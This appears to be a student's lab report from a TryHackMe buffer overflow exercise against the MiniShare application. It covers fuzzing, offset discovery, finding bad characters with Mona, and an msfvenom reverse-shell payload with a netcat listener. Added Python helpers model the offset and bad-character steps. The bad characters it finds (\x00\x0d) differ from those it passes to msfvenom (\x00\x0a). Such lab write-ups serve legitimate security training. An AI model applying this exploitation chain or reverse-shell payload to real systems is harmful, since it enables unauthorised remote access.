Buffer Overflow BOF - E2: Testing Organization


Testing Organization

Buffer Overflow Red Team Batch 3

BOF_E2
Tester's Name: M S V S Pavan
TryHackMe ID: pavanmsvs
Test Date: 10/07/2021

Copyright © 1996-2021 HackerU Ltd. All Rights Reserved.

PURPOSE OF TESTING

The purpose of this test was to find a vulnerability in the given application and use that vulnerability to gain user
access.

TOOLS USED TO FIND THE SYSTEM AND VULNERABILITY

Nmap was used to find the port on which the application is running. Msfvenom was used to create the payload, and the
Metasploit Framework tools (pattern_create.rb and pattern_offset.rb) were used to create the pattern and find the offset value.

GATHERING INFORMATION ON THE TARGET SYSTEM AND FINDING THE VULNERABILITY

We have to connect to the VPN to get access to THM.

From the nmap scan we can see that port 8888 is open and our application is running on that port. We are already
provided with a skeleton of the code; we have to use that skeleton and modify it to gain user access. From another
port, in the bin directory, we got the vulnerable application, downloaded it and transferred it to our testing machine,
where we will test our code and try to gain user access.

We got the skeleton from TryHackMe.

Now, extract the downloaded zip file on the Windows system and start the application.

EXPLOITING THE TARGET

Now we will start our testing on the local development system using the skeleton.

Use the skeleton with only the IP modified, as shown, to that of my local testing system. Now start the application
and run crash.py to see whether the application crashes or not.

As the application crashed from the 6000 "A"s sent to it, we will create a pattern of that size and try the crash attack once
more with our pattern to get the offset value.

For this we will have to use the Metasploit tool pattern_create.rb; this script will create a non-repeating character pattern of the
length we specify.

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 500

-l --> length of the pattern

Now we will put this pattern in place of the "A"s in our skeleton.

Now we have created the code with our 500-byte pattern and will execute it to get the offset value (the exact
crash point of the application).

After executing our code we see that we got an EIP value, which we will use to find the offset of the application, and at
the ESP address we can see our pattern. To find the offset we will use another Metasploit tool,
pattern_offset.rb, which will give the application's offset value.

As seen above, using the EIP value we found the offset of the application, which is 146. Now we will use this value in
our code to control the EIP.

We will use the skeleton with the offset value in it and pass extra "B" characters to get EIP control.
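To make clear what pattern_create.rb and pattern_offset.rb actually compute, here is an added Python reimplementation of both (example code, not part of the original report and not the Metasploit scripts themselves). It builds the same upper/lower/digit cyclic pattern Metasploit uses, then looks up the dword shown in EIP; the debugger displays EIP as a little-endian value, so the bytes are reversed before searching. The EIP value 39654138 used in the demo is constructed to land on the report's offset of 146, and the 42424242 value is the "BBBB" check from the step above, which correctly is not found in the pattern.

```python
import string

UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits


def pattern_create(length):
    """Build a non-repeating cyclic pattern the way pattern_create.rb does:
    each 3-byte group is one (upper, lower, digit) triple, so any 4-byte
    window occurs at exactly one position in the pattern."""
    out = []
    for c1 in UPPER:
        for c2 in LOWER:
            for c3 in DIGITS:
                out.append(c1 + c2 + c3)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    raise ValueError("pattern longer than the 20280 unique bytes available")


def pattern_offset(pattern, eip_hex):
    """Return the offset at which the dword now sitting in EIP was sent,
    the way pattern_offset.rb does. EIP is displayed little-endian, so the
    bytes are reversed first; a big-endian match is tried as a fallback.
    Returns None when the value is not part of the pattern at all (e.g.
    42424242 from the 'BBBB' control check)."""
    raw = bytes.fromhex(eip_hex)
    haystack = pattern.encode()
    for candidate in (raw[::-1], raw):
        idx = haystack.find(candidate)
        if idx != -1:
            return idx
    return None


if __name__ == "__main__":
    pat = pattern_create(500)
    print(pat[:30] + "...")
    # Constructed EIP value: the 4 pattern bytes at offset 146, little-endian.
    off = pattern_offset(pat, "39654138")
    print("offset:", off)                      # 146, matching the report
    print("bytes at offset:", pat[off:off + 4])  # '8Ae9'
    print("BBBB check:", pattern_offset(pat, "42424242"))  # None
```

The reversal step is the detail most often got wrong by hand: searching for the EIP bytes in display order would find nothing, which is why pattern_offset.rb tries the little-endian interpretation first.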

As seen at EIP, we got the ASCII value of our extra passed characters, i.e. 42424242. As we have controlled the EIP, we will
now find the bad characters in the application. For this we will use the built-in Mona module of Immunity Debugger.
We will configure a log folder first and then create a bytearray using the Mona module.

!mona config -set workingfolder c:\logs\%p --> to configure log folder

!mona bytearray --> create the byte array used to find bad characters

Once we have created the byte array using Mona, we will copy it into our code and execute it.

We can simply add this as a bad-character string and append it to the buffer, or pass it as the buf value after the given value in the skeleton.
Once we execute our code we will see which bad characters are present in the application, which we have to remove.

We got the ESP value, and using the Mona module we will compare the bytearray.bin file against memory at that address.

!mona compare -f c:\logs\minishare\bytearray.bin -a 032638D0

To find the bad characters we used this Mona command, and we have to use the correct ESP value from the register. We
can see that it says corruption after 1 byte, so we will remove the first character from the bytearray and execute
the code again. To remove the first bad character from the log we will use the Mona command

!mona bytearray -b "\x00"

Similarly, we will remove the bad character from our code as well and execute it to see if any other bad character is
present.

We can see that it says corruption after 0 bytes, so we will remove that character from the bytearray and again
execute the code. To remove the bad character from the log we will use the Mona command.

!mona bytearray -b "\x00\x0d"

Similarly, we will remove the bad character from our code as well and execute it to see if any other bad character is
present.

On executing our code after removing the bad characters, we again compare using the Mona command and find
that the status is unmodified, which means our application doesn't have any more bad characters.
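The loop of "send the byte array, compare at ESP, exclude the corrupted byte, repeat until unmodified" is the whole of the bad-character step, so here is an added Python model of it (example code, not from the report and not Mona's implementation). make_bytearray mirrors `!mona bytearray -b`, compare mirrors the "corruption after N bytes" / "unmodified" verdict of `!mona compare`, and simulated_copy is a constructed stand-in for the application (it truncates at NUL and rewrites \x0d as \x0a); it is not the real MiniShare behaviour, only a way to exercise the loop offline.

```python
def make_bytearray(exclude=b""):
    """Equivalent of '!mona bytearray -b "<bad>"': every byte value in
    order, minus the ones already known to be bad."""
    return bytes(b for b in range(256) if b not in exclude)


def compare(expected, observed):
    """Equivalent of '!mona compare': walk the bytes as sent (expected)
    against a dump of memory at ESP (observed). Reports 'unmodified' when
    they match; otherwise how many bytes survived intact before the first
    corruption and which byte was hit, the next candidate for exclusion."""
    n = min(len(expected), len(observed))
    for i in range(n):
        if expected[i] != observed[i]:
            return {"status": "corruption", "after": i, "bad": expected[i]}
    if len(observed) < len(expected):
        # Data was cut short (typical of a NUL-terminated string copy).
        return {"status": "truncated", "after": n, "bad": expected[n]}
    return {"status": "unmodified", "after": n, "bad": None}


def simulated_copy(data):
    """Constructed stand-in for the target, not the real application:
    stops at the first NUL (C string copy) and turns \\r into \\n."""
    data = data.split(b"\x00", 1)[0]
    return data.replace(b"\x0d", b"\x0a")


def find_bad_chars(send):
    """Repeat the report's loop: send the byte array, compare what landed
    at ESP, exclude the corrupted byte, until the verdict is 'unmodified'.
    `send` takes the bytes sent and returns the bytes observed at ESP."""
    bad = b""
    while True:
        arr = make_bytearray(bad)
        result = compare(arr, send(arr))
        if result["status"] == "unmodified":
            return bad
        bad += bytes([result["bad"]])


if __name__ == "__main__":
    found = find_bad_chars(simulated_copy)
    print("bad chars:", "".join("\\x%02x" % b for b in found))
    # With the constructed target this prints \x00\x0d, and the next
    # compare against make_bytearray(found) reports 'unmodified'.
```

Two points the model makes visible: the first round of the simulated target reports truncation rather than corruption, because a NUL stops the copy at byte zero, and a byte that is merely rewritten (\x0d to \x0a) still counts as bad even though the rest of the array arrives intact. Each excluded byte changes the positions of everything after it, which is why the array must be regenerated and resent rather than edited in place.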

(Note: the JMP ESP address should be taken carefully, as it changes.)

If we try directly, we are unable to find the JMP ESP address using the Mona modules, but in the TryHackMe room they gave
a hint:

There is another application that is running with user32.dll.

Now we are set to create our payload using msfvenom to gain user control and get shell access to the
testing system.

msfvenom -p windows/shell_reverse_tcp lhost=192.168.0.118 lport=4444 -b "\x00\x0a" -f python

-p --> payload used (here a TCP reverse shell)

lhost --> local host (our system's IP)

lport --> the port on which we want to receive the shell

-b --> bad characters to be excluded from our payload. We copy this buf value into our code, changing it as per
the skeleton provided, and add the JMP ESP address and NOP padding: padding = "\x90" * 16.

Now, before executing this code, we will have to open a listener on port 4444, which we gave as lport in our payload,
using netcat to get the shell.

On executing our shellcode we got the local system shell; thus we successfully created a shellcode which gave us
local system access. Now we will create the payload for the THM machine: as we are connected via VPN we will use the tun0 IP
in the payload and change the target IP in our code.

Minishare_proof.txt flag: - BD87238361767F91DB548CD0FD8CA8A09BB664E5A

We successfully got user access to the system and got the flag, and submitted the flag in THM.